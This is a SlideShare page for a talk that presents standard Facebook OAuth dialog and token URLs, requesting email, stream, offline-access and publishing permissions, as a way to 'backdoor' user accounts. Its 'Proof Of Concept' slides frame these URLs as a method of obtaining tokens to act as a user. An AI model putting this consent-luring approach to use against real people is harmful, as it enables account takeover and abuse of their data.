SlideShare a Scribd company logo

Easy Way To Make Facebook Account Backdoor Without Scripting

Download as PPTX, PDF
Budi Khoirudin
Budi Khoirudin

This document discusses creating a backdoor for Facebook accounts without scripting. It explains how to request permissions from a user's Facebook account by redirecting them to a URL that requests email, read stream, offline access, and publish stream permissions. It then shows how to get an access token by using an app ID and secret to act as a vendor. Finally, it demonstrates getting an access token by redirecting the user to a URL that returns the token, allowing the app to act as the user.

Technology
1 of 13
Easy Way To Make Facebook Account Backdoor Without Scripting Presented By Budi Khoirudin feedback@khoirudin.com http://budi.khoirudin.com/
About Me Hello My Name is Budi Khoirudin. I’m a IT Security Enthusiast's, IT Developer, Speaker, etc ... Now I’m Working as Web Developer in a Enterprise Corporation Project Freelancer
Knocking On Facebook Don’t be a kiddies forever, You must be know how it works!
Facebook Application (Reference: https://www.facebook.com/help?page=1095)
Facebook Application Authentication Facebook Platform supports two different OAuth 2.0 flows for user login: server-side (known as the authentication code flow in the specification) and client-side (known as the implicit flow). The server-side flow is used whenever you need to call the Graph API from your web server. The client-side flow is used when you need to make calls to the Graph API from a client, such as JavaScript running in a Web browser or from a native mobile or desktop app. (Reference: https://developers.facebook.com/docs/authentication/)
Graph API (Reference: https://developers.facebook.com/docs/reference/api/)
Graph API Permissions (Reference: https://developers.facebook.com/docs/reference/api/permissions/)
Graph API Explorer (Reference: https://developers.facebook.com/tools/explorer)
Let’s Beat Them! …Proof Of Concept.
Facebook Account Backdoor (Request Permissions) https://www.facebook.com/dialog/oauth?client_id=YOUR_APP_ID&redirect_uri=YOUR_URL&scope=email,read_stream,offline_access,publish_stream
Facebook Account Backdoor (Act As Vendor) https://graph.facebook.com/oauth/access_token?client_id=YOUR_APP_ID&client_secret=YOUR_APP_SECRET&grant_type=CLIENT_CREDENTIALS
Facebook Account Backdoor(Act As User) https://www.facebook.com/dialog/oauth?client_id=YOUR_APP_ID&redirect_uri=YOUR_URL&response_type=token
Any Questions? ...Ask To Me “Backdoorku Menghantuimu!”

Recommended

How i hacked programer computer
How i hacked programer computerHow i hacked programer computer
How i hacked programer computer
Budi Khoirudin
 
Facebook API in the Real World - Myles Noton - Miniclip
Facebook API in the Real World - Myles Noton - MiniclipFacebook API in the Real World - Myles Noton - Miniclip
Facebook API in the Real World - Myles Noton - Miniclip
Myles Noton
 
OAuth Introduction
OAuth IntroductionOAuth Introduction
OAuth Introductionh_marvin
 
Facebook api
Facebook api Facebook api
Facebook api
snipermkd
 
Samsung Mobile Phone Codes
Samsung Mobile Phone CodesSamsung Mobile Phone Codes
Samsung Mobile Phone Codes
Lenny Henningham
 
Facebook SSO.docx
Facebook SSO.docxFacebook SSO.docx
Facebook SSO.docx
ehathis
 
Virtual Tech Days 2010 - Integrating Social Networks with ASP.NET
Virtual Tech Days 2010 - Integrating Social Networks with ASP.NETVirtual Tech Days 2010 - Integrating Social Networks with ASP.NET
Virtual Tech Days 2010 - Integrating Social Networks with ASP.NETKrishna T
 
DevCon 2010 - Facebook Apps development for ASP.NET devs
DevCon 2010 - Facebook Apps development for ASP.NET devsDevCon 2010 - Facebook Apps development for ASP.NET devs
DevCon 2010 - Facebook Apps development for ASP.NET devsKrishna T
 

Recommended

How i hacked programer computer
How i hacked programer computerHow i hacked programer computer
How i hacked programer computer
Budi Khoirudin
 
Facebook API in the Real World - Myles Noton - Miniclip
Facebook API in the Real World - Myles Noton - MiniclipFacebook API in the Real World - Myles Noton - Miniclip
Facebook API in the Real World - Myles Noton - Miniclip
Myles Noton
 
OAuth Introduction
OAuth IntroductionOAuth Introduction
OAuth Introductionh_marvin
 
Facebook api
Facebook api Facebook api
Facebook api
snipermkd
 
Samsung Mobile Phone Codes
Samsung Mobile Phone CodesSamsung Mobile Phone Codes
Samsung Mobile Phone Codes
Lenny Henningham
 
Facebook SSO.docx
Facebook SSO.docxFacebook SSO.docx
Facebook SSO.docx
ehathis
 
Virtual Tech Days 2010 - Integrating Social Networks with ASP.NET
Virtual Tech Days 2010 - Integrating Social Networks with ASP.NETVirtual Tech Days 2010 - Integrating Social Networks with ASP.NET
Virtual Tech Days 2010 - Integrating Social Networks with ASP.NETKrishna T
 
DevCon 2010 - Facebook Apps development for ASP.NET devs
DevCon 2010 - Facebook Apps development for ASP.NET devsDevCon 2010 - Facebook Apps development for ASP.NET devs
DevCon 2010 - Facebook Apps development for ASP.NET devsKrishna T
 
Leveraging Rails to Build Facebook Apps
Leveraging Rails to Build Facebook AppsLeveraging Rails to Build Facebook Apps
Leveraging Rails to Build Facebook Apps
David Keener
 
Download PowerPoint Project on social programming for engineering students
Download PowerPoint Project on social programming for engineering studentsDownload PowerPoint Project on social programming for engineering students
Download PowerPoint Project on social programming for engineering students
SkyingBlogger
 
Facebook Connect
Facebook ConnectFacebook Connect
Facebook Connect
Pitra Satvika
 
Implementing open authentication_in_your_app
Implementing open authentication_in_your_appImplementing open authentication_in_your_app
Implementing open authentication_in_your_app
Nuhil Mehdy
 
End-to-end Mobile App Development (with iOS and Azure Mobile Services)
End-to-end Mobile App Development (with iOS and Azure Mobile Services)End-to-end Mobile App Development (with iOS and Azure Mobile Services)
End-to-end Mobile App Development (with iOS and Azure Mobile Services)
Andri Yadi
 
Alexa vs Google Assistant - Comparison
Alexa vs Google Assistant - ComparisonAlexa vs Google Assistant - Comparison
Alexa vs Google Assistant - Comparison
Tarun Chawdhury
 
Resume
ResumeResume
ResumeBhim Kumar
 
Interactive with-facebook
Interactive with-facebookInteractive with-facebook
Interactive with-facebook
Tien Nguyen
 
Microsoft identity manoj mittal
Microsoft identity manoj mittalMicrosoft identity manoj mittal
Microsoft identity manoj mittal
Manoj Mittal
 
End to End Security with MVC and Web API
End to End Security with MVC and Web APIEnd to End Security with MVC and Web API
End to End Security with MVC and Web API
Michele Leroux Bustamante
 
Single sign on - SSO
Single sign on - SSOSingle sign on - SSO
Single sign on - SSO
Ajit Dadresa
 
Mkp resume.docx
Mkp resume.docxMkp resume.docx
Mkp resume.docx
Mithilesh Kumar
 
How to create Zoom Meet with Pega
How to create Zoom Meet with PegaHow to create Zoom Meet with Pega
How to create Zoom Meet with Pega
SamuelJude1
 
Intro to Bot Framework v3
Intro to Bot Framework v3Intro to Bot Framework v3
Intro to Bot Framework v3
Shahed Chowdhuri
 
Facebook Login & Open Graph Introduction
Facebook Login & Open Graph IntroductionFacebook Login & Open Graph Introduction
Facebook Login & Open Graph Introduction
Eric Ping
 
What's New on the Facebook Platform, July 2011
What's New on the Facebook Platform, July 2011What's New on the Facebook Platform, July 2011
What's New on the Facebook Platform, July 2011
Iskandar Najmuddin
 
Integrate facebook using mule esb
Integrate facebook using mule esbIntegrate facebook using mule esb
Integrate facebook using mule esb
Sanjeet Pandey
 
Php day 2011 - Interactive-with-facebook
Php day 2011 - Interactive-with-facebookPhp day 2011 - Interactive-with-facebook
Php day 2011 - Interactive-with-facebookQuang Anh Le
 
Live Identity Services Drilldown - PDC 2008
Live Identity Services Drilldown - PDC 2008Live Identity Services Drilldown - PDC 2008
Live Identity Services Drilldown - PDC 2008
Jorgen Thelin
 
SharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning ModelsSharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning Models
Shailen Sukul
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Vladimir Iglovikov, Ph.D.
 

More Related Content

Similar to Easy Way To Make Facebook Account Backdoor Without Scripting

Leveraging Rails to Build Facebook Apps
Leveraging Rails to Build Facebook AppsLeveraging Rails to Build Facebook Apps
Leveraging Rails to Build Facebook Apps
David Keener
 
Download PowerPoint Project on social programming for engineering students
Download PowerPoint Project on social programming for engineering studentsDownload PowerPoint Project on social programming for engineering students
Download PowerPoint Project on social programming for engineering students
SkyingBlogger
 
Facebook Connect
Facebook ConnectFacebook Connect
Facebook Connect
Pitra Satvika
 
Implementing open authentication_in_your_app
Implementing open authentication_in_your_appImplementing open authentication_in_your_app
Implementing open authentication_in_your_app
Nuhil Mehdy
 
End-to-end Mobile App Development (with iOS and Azure Mobile Services)
End-to-end Mobile App Development (with iOS and Azure Mobile Services)End-to-end Mobile App Development (with iOS and Azure Mobile Services)
End-to-end Mobile App Development (with iOS and Azure Mobile Services)
Andri Yadi
 
Alexa vs Google Assistant - Comparison
Alexa vs Google Assistant - ComparisonAlexa vs Google Assistant - Comparison
Alexa vs Google Assistant - Comparison
Tarun Chawdhury
 
Interactive with-facebook
Interactive with-facebookInteractive with-facebook
Interactive with-facebook
Tien Nguyen
 
Microsoft identity manoj mittal
Microsoft identity manoj mittalMicrosoft identity manoj mittal
Microsoft identity manoj mittal
Manoj Mittal
 
End to End Security with MVC and Web API
End to End Security with MVC and Web APIEnd to End Security with MVC and Web API
End to End Security with MVC and Web API
Michele Leroux Bustamante
 
Single sign on - SSO
Single sign on - SSOSingle sign on - SSO
Single sign on - SSO
Ajit Dadresa
 
Mkp resume.docx
Mkp resume.docxMkp resume.docx
Mkp resume.docx
Mithilesh Kumar
 
How to create Zoom Meet with Pega
How to create Zoom Meet with PegaHow to create Zoom Meet with Pega
How to create Zoom Meet with Pega
SamuelJude1
 
Intro to Bot Framework v3
Intro to Bot Framework v3Intro to Bot Framework v3
Intro to Bot Framework v3
Shahed Chowdhuri
 
Facebook Login & Open Graph Introduction
Facebook Login & Open Graph IntroductionFacebook Login & Open Graph Introduction
Facebook Login & Open Graph Introduction
Eric Ping
 
What's New on the Facebook Platform, July 2011
What's New on the Facebook Platform, July 2011What's New on the Facebook Platform, July 2011
What's New on the Facebook Platform, July 2011
Iskandar Najmuddin
 
Integrate facebook using mule esb
Integrate facebook using mule esbIntegrate facebook using mule esb
Integrate facebook using mule esb
Sanjeet Pandey
 
Php day 2011 - Interactive-with-facebook
Php day 2011 - Interactive-with-facebookPhp day 2011 - Interactive-with-facebook
Php day 2011 - Interactive-with-facebookQuang Anh Le
 
Live Identity Services Drilldown - PDC 2008
Live Identity Services Drilldown - PDC 2008Live Identity Services Drilldown - PDC 2008
Live Identity Services Drilldown - PDC 2008
Jorgen Thelin
 
SharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning ModelsSharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning Models
Shailen Sukul
 

Similar to Easy Way To Make Facebook Account Backdoor Without Scripting (20)

Leveraging Rails to Build Facebook Apps
Leveraging Rails to Build Facebook AppsLeveraging Rails to Build Facebook Apps
Leveraging Rails to Build Facebook Apps
 
Download PowerPoint Project on social programming for engineering students
Download PowerPoint Project on social programming for engineering studentsDownload PowerPoint Project on social programming for engineering students
Download PowerPoint Project on social programming for engineering students
 
Facebook Connect
Facebook ConnectFacebook Connect
Facebook Connect
 
Implementing open authentication_in_your_app
Implementing open authentication_in_your_appImplementing open authentication_in_your_app
Implementing open authentication_in_your_app
 
End-to-end Mobile App Development (with iOS and Azure Mobile Services)
End-to-end Mobile App Development (with iOS and Azure Mobile Services)End-to-end Mobile App Development (with iOS and Azure Mobile Services)
End-to-end Mobile App Development (with iOS and Azure Mobile Services)
 
Alexa vs Google Assistant - Comparison
Alexa vs Google Assistant - ComparisonAlexa vs Google Assistant - Comparison
Alexa vs Google Assistant - Comparison
 
Resume
ResumeResume
Resume
 
Interactive with-facebook
Interactive with-facebookInteractive with-facebook
Interactive with-facebook
 
Microsoft identity manoj mittal
Microsoft identity manoj mittalMicrosoft identity manoj mittal
Microsoft identity manoj mittal
 
End to End Security with MVC and Web API
End to End Security with MVC and Web APIEnd to End Security with MVC and Web API
End to End Security with MVC and Web API
 
Single sign on - SSO
Single sign on - SSOSingle sign on - SSO
Single sign on - SSO
 
Mkp resume.docx
Mkp resume.docxMkp resume.docx
Mkp resume.docx
 
How to create Zoom Meet with Pega
How to create Zoom Meet with PegaHow to create Zoom Meet with Pega
How to create Zoom Meet with Pega
 
Intro to Bot Framework v3
Intro to Bot Framework v3Intro to Bot Framework v3
Intro to Bot Framework v3
 
Facebook Login & Open Graph Introduction
Facebook Login & Open Graph IntroductionFacebook Login & Open Graph Introduction
Facebook Login & Open Graph Introduction
 
What's New on the Facebook Platform, July 2011
What's New on the Facebook Platform, July 2011What's New on the Facebook Platform, July 2011
What's New on the Facebook Platform, July 2011
 
Integrate facebook using mule esb
Integrate facebook using mule esbIntegrate facebook using mule esb
Integrate facebook using mule esb
 
Php day 2011 - Interactive-with-facebook
Php day 2011 - Interactive-with-facebookPhp day 2011 - Interactive-with-facebook
Php day 2011 - Interactive-with-facebook
 
Live Identity Services Drilldown - PDC 2008
Live Identity Services Drilldown - PDC 2008Live Identity Services Drilldown - PDC 2008
Live Identity Services Drilldown - PDC 2008
 
SharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning ModelsSharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning Models
 

Recently uploaded

GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Vladimir Iglovikov, Ph.D.
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
Alex Pruden
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
Rohit Gautam
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 

Recently uploaded (20)

GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 

Easy Way To Make Facebook Account Backdoor Without Scripting

  • 1. Easy Way To Make Facebook Account Backdoor Without Scripting Presented By Budi Khoirudin feedback@khoirudin.com http://budi.khoirudin.com/
  • 2. About Me Hello My Name is Budi Khoirudin. I’m a IT Security Enthusiast's, IT Developer, Speaker, etc ... Now I’m Working as Web Developer in a Enterprise Corporation Project Freelancer
  • 3. Knocking On Facebook Don’t be a kiddies forever, You must be know how it works!
  • 4. Facebook Application (Reference: https://www.facebook.com/help?page=1095)
  • 5. Facebook Application Authentication Facebook Platform supports two different OAuth 2.0 flows for user login: server-side (known as the authentication code flow in the specification) and client-side (known as the implicit flow). The server-side flow is used whenever you need to call the Graph API from your web server. The client-side flow is used when you need to make calls to the Graph API from a client, such as JavaScript running in a Web browser or from a native mobile or desktop app. (Reference: https://developers.facebook.com/docs/authentication/)
  • 6. Graph API (Reference: https://developers.facebook.com/docs/reference/api/)
  • 7. Graph API Permissions (Reference: https://developers.facebook.com/docs/reference/api/permissions/)
  • 8. Graph API Explorer (Reference: https://developers.facebook.com/tools/explorer)
  • 9. Let’s Beat Them! …Proof Of Concept.
  • 10. Facebook Account Backdoor (Request Permissions) https://www.facebook.com/dialog/oauth?client_id=YOUR_APP_ID&redirect_uri=YOUR_URL&scope=email,read_stream,offline_access,publish_stream
  • 11. Facebook Account Backdoor (Act As Vendor) https://graph.facebook.com/oauth/access_token?client_id=YOUR_APP_ID&client_secret=YOUR_APP_SECRET&grant_type=CLIENT_CREDENTIALS
  • 12. Facebook Account Backdoor(Act As User) https://www.facebook.com/dialog/oauth?client_id=YOUR_APP_ID&redirect_uri=YOUR_URL&response_type=token
  • 13. Any Questions? ...Ask To Me “Backdoorku Menghantuimu!”